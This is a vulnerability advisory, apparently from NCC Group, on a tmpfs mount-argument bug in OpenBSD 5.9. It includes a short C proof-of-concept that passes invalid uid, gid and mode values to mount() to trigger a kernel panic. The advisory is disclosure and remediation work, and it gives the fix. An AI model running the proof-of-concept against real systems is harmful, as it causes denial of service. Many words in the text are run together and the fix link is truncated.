|  
 #ifdef BUG_WRITEUP //--------------------------------------------------- 
 Tmpfs mount with bad args can lead to a panic 
  
 Impact: 
 Root users or users on systems with kern.usermount setto truecan 
 trigger a kernel panic when mounting a tmpfs filesystem. 
  
 Description: 
 The tmpfs filesystem allows the mounting user to specify a 
 username, a groupname or a device name forthe root node of 
 the filesystem. A user that specifies a value of VNOVAL for
 any of these fields will trigger an assert intmpfs_alloc_node(): 
  
 KASSERT(uid != VNOVAL && gid != VNOVAL && mode != VNOVAL); 
  
 This condition can only be triggered by users who are allowed 
 to mount a tmpfs filesystem. Normally thisisthe root user, but 
 ifthe kern.usernmount sysctl variable has been setto true, 
 any user could trigger thispanic. 
  
 Reproduction: 
 Run the attached mount_panic.c program. It will mount a tmpfs 
 filesystem with invalid settings and will lead to a panic of 
 "panic: kernel diagnostic assertion "uid != VNOVAL && gid != VNOVAL 
 && mode != VNOVAL" failed". NCC Group was able to reproduce thisissue 
 on OpenBSD 5.9 release running amd64. 
  
 Recommendation: 
 Validate the args.ta_root_uid, args.ta_root_gid and args.ta_root_mode 
 fields intmpfs_mount() before calling tmpfs_alloc_node(). 
 Return an error to the user when an invalid argument isdetected. 
  
 Reported: 2016-07-11 
 Fixed: http:
  
 #endif // BUG_WRITEUP --------------------------------------------------- 
  
  
 #include <stdio.h> 
 #include <stdlib.h> 
 #include <string.h> 
 #include <sys/param.h> 
 #include <sys/mount.h> 
  
 #define VNOVAL (-1) 
  
 intmain(intargc, char**argv) 
 { 
 structtmpfs_args args; 
 intx; 
  
 memset(&args, 0, sizeofargs); 
 args.ta_version = TMPFS_ARGS_VERSION; 
 args.ta_root_uid = VNOVAL; 
 args.ta_root_gid = VNOVAL; 
 args.ta_root_mode = VNOVAL; 
 x = mount("tmpfs", "/mnt", 0, &args); 
 if(x == -1) 
 perror("mount"); 
 printf("no crash!\n"); 
 return0; 
 } 
 
 |